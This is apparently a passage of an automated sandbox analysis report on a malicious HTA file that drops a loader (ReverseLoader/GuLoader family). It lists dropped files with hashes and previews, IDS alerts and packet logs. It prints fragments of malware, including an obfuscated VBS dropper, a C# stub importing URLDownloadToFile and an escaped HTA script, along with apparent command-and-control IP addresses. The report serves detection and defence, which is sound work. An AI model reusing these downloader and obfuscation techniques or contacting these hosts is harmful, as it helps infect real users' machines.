	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.84.67 151.101.1.137
	https://docsend.com/v/ty7vw/up-date	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\createdbestthingswithenergylevelgoodforbusinesspuropse[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3341), with CRLF line terminators
Category:	dropped
Size (bytes):	154180
Entropy (8bit):	3.8061863361215384
Encrypted:	false
SSDEEP:	3072:ADeuJcbItLHY1mpcE5AiGsUZDeuJcbItLHY1mpcE5AiGsUhDeuJcbItLHY1mpcE6:UelbI5Smpd5ZGsU9elbI5Smpd5ZGsUFM
MD5:	5DA614ACF7D7316B736E7A7CA2644C8C
SHA1:	CB280593F1E14C30F16748422BB38068B5777BC0
SHA-256:	4985AE0F8C949A8E6DF0A3BC38F29D42F85AECB51429A4BCB8F4E73E0DBBDB33
SHA-512:	444792400EF972B1095A772DD8EFEC4DC3A9914524FDB8AA79813A2715B277DD584FB8FE4CEC6D4D085F0F0F86CD6F2DAD9576BCAAC51B3C55D75B53A1BED070
Malicious:	false
Preview:	...... . . . .....K.O.L.Q.k.e.L.K.e.m.C.g.k.k.x. .=. .".i.p.e.v.n.W.r.L.p.W.c.W.k.p.b.".....K.u.W.k.K.e.G.P.U.L.z.b.i.W.P. .=. .".L.A.W.f.A.W.G.T.U.B.i.W.b.n.K.".....z.d.v.i.m.q.b.k.r.m.x.K.P.d.c. .=. .".a.P.s.a.s.o.H.I.L.o.N.r.G.K.z.".........i.c.a.b.G.W.K.H.L.P.C.z.g.T.A. .=. .".k.G.L.m.L.L.v.G.c.O.Z.q.r.k.R.".....K.A.P.A.u.G.c.N.g.m.W.e.C.L.A. .=. .".a.Z.n.P.Q.L.G.B.j.a.O.z.U.b.i.".....p.t.c.A.C.n.k.G.A.L.o.f.U.u.e. .=. .".J.k.e.m.Z.R.W.L.W.f.j.d.Z.c.W.".....b.j.B.i.Q.W.Z.L.i.a.e.W.o.L.c. .=. .".n.G.W.I.W.m.L.h.b.x.q.O.L.U.f.".....d.K.d.i.l.e.k.W.s.C.x.A.o.o.m. .=. .".A.a.O.o.N.U.O.O.f.W.L.m.z.K.L.".....G.L.z.p.i.K.z.e.h.P.c.K.z.U.b. .=. .".a.L.P.e.L.C.P.K.c.K.G.n.G.W.x.".....H.U.W.z.p.B.i.c.P.K.K.J.j.h.n. .=. .".A.G.T.G.s.h.U.i.x.f.h.h.Q.p.W.".....R.z.e.K.K.f.d.c.u.A.P.A.O.p.e. .=. .".j.G.Z.n.W.A.H.W.W.Z.c.H.W.z.o.".....U.b.B.Z.W.N.G.h.z.d.i.d.T.t.U. .=. .".C.z.c.N.l.c.L.i.a.A.L.z.U.W.b.".....J.u.A.a.u.e.i.R.i.h.W.n.b.G.m. .=. .".W.p.G.k.d.K.o.L.k.G.P.h.W.C.L.".....b.n.W.e.l.G.W.r.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	5.290848674040258
Encrypted:	false
SSDEEP:	24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
MD5:	374272AB01A3AD6B586FC209D47F884D
SHA1:	8C785EB3C085C24C140A197D553DE29B3AF5628A
SHA-256:	FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
SHA-512:	4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
Malicious:	false
Preview:	@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\RESD327.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Tue Dec 17 08:18:45 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9886478395460263
Encrypted:	false
SSDEEP:	24:H0m9pCYoXsHDwKTFexmfwI+ycuZhNYakSkPNnqSSd:LBos0KTAxmo1ulYa3kqSC
MD5:	2F3B475C5750D22B2BEF614B28B3868F
SHA1:	18C0498F8C98CCB7A619985AF501E749338A44E0
SHA-256:	5C9D8B41E752F96186AEE0C31290412F4E8950F920788E4AAFC8668D44F907E9
SHA-512:	93D4743157161D8C77E22BBF6340DD4B8C606C4ABA4C327F622B2930DC425CD838247A20A4E2984AF0521DFF569F1500EF2CE19FFD26F89C335D3438D600D4C9
Malicious:	false
Preview:	L....3ag.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP....................y.7.R....[.T...........5.......C:\Users\user\AppData\Local\Temp\RESD327.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.l.2.m.z.r.q.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01hknfet.vve.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_es0xwlcn.ybs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2w0ygoe.pna.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jp2ojsae.ove.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le5ooktt.mpt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmoy3krf.004.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1059339161225235
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylYak7YnqqENPN5Dlq5J:+RI+ycuZhNYakSkPNnqX
MD5:	13BE79E237F552CD86FB8B1A5BDD541D
SHA1:	FFC6755EB0E59A72DD07ECBC32CE40AD641C693E
SHA-256:	B43971115179A8D507F3FE5A632130957115EC191E5F65A1C91CABEA9583E67C
SHA-512:	50A2379A3F3995222A858562E856237542DE067845FDB14B0D004C5DF644EC49127B80838DBAD13063721286B29D1C5A8C38160A6E4D2C2ABBD19350F5CDC29E
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.l.2.m.z.r.q.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.l.2.m.z.r.q.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (385)
Category:	dropped
Size (bytes):	494
Entropy (8bit):	3.855733339090536
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuP4gFPMOJQXReKJ8SRHy4H6nPOnApcN/aTy:V/DTLDfuzFtuXfHWDTTy
MD5:	22B13C37F1DCA7A1454D8C4850803768
SHA1:	7ACE6A705D75D90D88B0A52B78E0F4E32ED677B1
SHA-256:	DFE612889B13024FA949ACDCC68A40235EF6396D13C4F93F4D4DB10A0FD5A826
SHA-512:	16ED96E0FBA68FF8686EDFB4D7F57945385C4D4F79000E0E54D7D0815B9F6DFF198C844204444FEBC510DB6F307B5D213F16D688D10EBEC78A9F1932814A643F
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace Lx.{. public class lSK. {. [DllImport("URlmOn.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr qjoUBHXb,string kbMeaeqz,string BKvVkXfUrFn,uint VDyEzfvs,IntPtr UiaqMFZAUiD);.. }..}.

C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.238070432785957
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f6o0zxs7+AEszI923f6un:p37Lvkmb6KzCo0WZE2Cu
MD5:	8B20B4B5A38A49033AF22B916783EA00
SHA1:	8DB50892762CDAEB69DF817679C42B3C901B30B7
SHA-256:	859200BEB349714F336AB0AF5C72D30D1AEFB9B354BD94DAD2E135CBFC0A8F73
SHA-512:	3397291C10B14D8F7245A45BEF0FE5EE0581B7347569475E14F2B4515413ED78AD8FB9DADC1D1BE67EC32571092CE940E9860253CE90033A6FD491D44D978E08
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.0.cs"

C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.86107737915623
Encrypted:	false
SSDEEP:	24:etGS2peYYLPl78sdvgkCdrCN4tkZf5+W0QTyAFWI+ycuZhNYakSkPNnq:6VYwPlIOUZCNvJ5+W0Q+91ulYa3kq
MD5:	65C8EDF4DF857039CF1CB5A0C816D2C2
SHA1:	999A684894497559274F437D4DDAC7EB83CC3DBA
SHA-256:	A598CBE199302DA434AF66CE1943D3A0B3F9097D6522610628427DCF2E2D9F6B
SHA-512:	0651EEB400D0E487821D6B06D7FA348DAF018C6365F5EF284DD60BF97CAF48D732C1217272DB243412A483048CEA17EC1E580E072DBA7179DBABED60ABE79A8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3ag...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'...................................................... 5.....P ......G.........M.....V....._.....k.....t...G.....G...!.G.....G.......!............5..................................................<Module>.zl

C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
Category:	modified
Size (bytes):	870
Entropy (8bit):	5.320620050367835
Encrypted:	false
SSDEEP:	24:KMoqd3ka6KzCAE2CPKax5DqBVKVrdFAMBJTH:doika6a1E20K2DcVKdBJj
MD5:	2E9D816539C0BDAFE0FFF7EDB02864BB
SHA1:	D80D97243C04FD004A1C21D170BB6535DD7C0D5E
SHA-256:	155AF910B47319731B834BA4F3308A79BB090820BF98E000A96F6BD9659F840D
SHA-512:	9073623D9E67BDEDDBA72884C2046041A6CFFEF9A05278B3E571227CF7B78E65BD155A226CB6FD8C7E16B6738D7EB806EAD1A1340179FE2EF411BEAD2B3195FB
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3341), with CRLF line terminators
Category:	dropped
Size (bytes):	154180
Entropy (8bit):	3.8061863361215384
Encrypted:	false
SSDEEP:	3072:ADeuJcbItLHY1mpcE5AiGsUZDeuJcbItLHY1mpcE5AiGsUhDeuJcbItLHY1mpcE6:UelbI5Smpd5ZGsU9elbI5Smpd5ZGsUFM
MD5:	5DA614ACF7D7316B736E7A7CA2644C8C
SHA1:	CB280593F1E14C30F16748422BB38068B5777BC0
SHA-256:	4985AE0F8C949A8E6DF0A3BC38F29D42F85AECB51429A4BCB8F4E73E0DBBDB33
SHA-512:	444792400EF972B1095A772DD8EFEC4DC3A9914524FDB8AA79813A2715B277DD584FB8FE4CEC6D4D085F0F0F86CD6F2DAD9576BCAAC51B3C55D75B53A1BED070
Malicious:	true
Preview:	...... . . . .....K.O.L.Q.k.e.L.K.e.m.C.g.k.k.x. .=. .".i.p.e.v.n.W.r.L.p.W.c.W.k.p.b.".....K.u.W.k.K.e.G.P.U.L.z.b.i.W.P. .=. .".L.A.W.f.A.W.G.T.U.B.i.W.b.n.K.".....z.d.v.i.m.q.b.k.r.m.x.K.P.d.c. .=. .".a.P.s.a.s.o.H.I.L.o.N.r.G.K.z.".........i.c.a.b.G.W.K.H.L.P.C.z.g.T.A. .=. .".k.G.L.m.L.L.v.G.c.O.Z.q.r.k.R.".....K.A.P.A.u.G.c.N.g.m.W.e.C.L.A. .=. .".a.Z.n.P.Q.L.G.B.j.a.O.z.U.b.i.".....p.t.c.A.C.n.k.G.A.L.o.f.U.u.e. .=. .".J.k.e.m.Z.R.W.L.W.f.j.d.Z.c.W.".....b.j.B.i.Q.W.Z.L.i.a.e.W.o.L.c. .=. .".n.G.W.I.W.m.L.h.b.x.q.O.L.U.f.".....d.K.d.i.l.e.k.W.s.C.x.A.o.o.m. .=. .".A.a.O.o.N.U.O.O.f.W.L.m.z.K.L.".....G.L.z.p.i.K.z.e.h.P.c.K.z.U.b. .=. .".a.L.P.e.L.C.P.K.c.K.G.n.G.W.x.".....H.U.W.z.p.B.i.c.P.K.K.J.j.h.n. .=. .".A.G.T.G.s.h.U.i.x.f.h.h.Q.p.W.".....R.z.e.K.K.f.d.c.u.A.P.A.O.p.e. .=. .".j.G.Z.n.W.A.H.W.W.Z.c.H.W.z.o.".....U.b.B.Z.W.N.G.h.z.d.i.d.T.t.U. .=. .".C.z.c.N.l.c.L.i.a.A.L.z.U.W.b.".....J.u.A.a.u.e.i.R.i.h.W.n.b.G.m. .=. .".W.p.G.k.d.K.o.L.k.G.P.h.W.C.L.".....b.n.W.e.l.G.W.r.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Entropy (8bit):	2.6539664201876336
TrID:
File name:	createdbetterthingswithgreatnressgivenmebackwithnice.hta
File size:	147'931 bytes
MD5:	a6970349fa549932767b924de6e7952b
SHA1:	c780e03f22ebf6b2418b210dddd22472e7b003e9
SHA256:	15f451bcfbbaf0532eb4c29a2651b10f68c40cef82d308efbb52fd1a20d85318
SHA512:	e65c5ee3dc36bf8391d9f51027df1578bd74a0e617198ef101f5c96cb301ea6b44c873c573692fe8e5a5e9930522d3e59d46a143f40c318eb906171ddc037069
SSDEEP:	768:t1EQ66dDJeum2oum25T6lS5KUJDVUKhC14GVf/Av66dDumAVYxequccVFArb7uh7:tc
TLSH:	9FE35B27D59FE43867A7BDFBE72CBE2A5283FD02EC8945C7055C45900EE2ACA7234944
File Content Preview:	<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T07:21:19.798161+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.5	49704	172.245.123.12	80	TCP
2024-12-17T07:21:31.595194+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	151.101.1.137	443	192.168.2.5	49706	TCP
2024-12-17T07:21:51.952862+0100	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.5	49760	104.21.84.67	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 07:21:18.559370995 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:18.679471016 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:18.679594994 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:18.679857016 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:18.799670935 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.797969103 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798023939 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798038960 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798083067 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798154116 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798161030 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.798177958 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798194885 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.798194885 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.798214912 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798223972 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.798258066 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.798428059 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798464060 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798482895 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.798538923 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.798597097 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.918241024 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.918281078 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.918648005 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.990165949 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.990300894 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.990428925 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.990525961 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.994401932 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.994482040 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:19.994545937 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:19.994607925 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.002835035 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.002937078 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.003002882 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.003063917 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.011218071 CET	80	49704	172.245.123.12	192.168.2.5
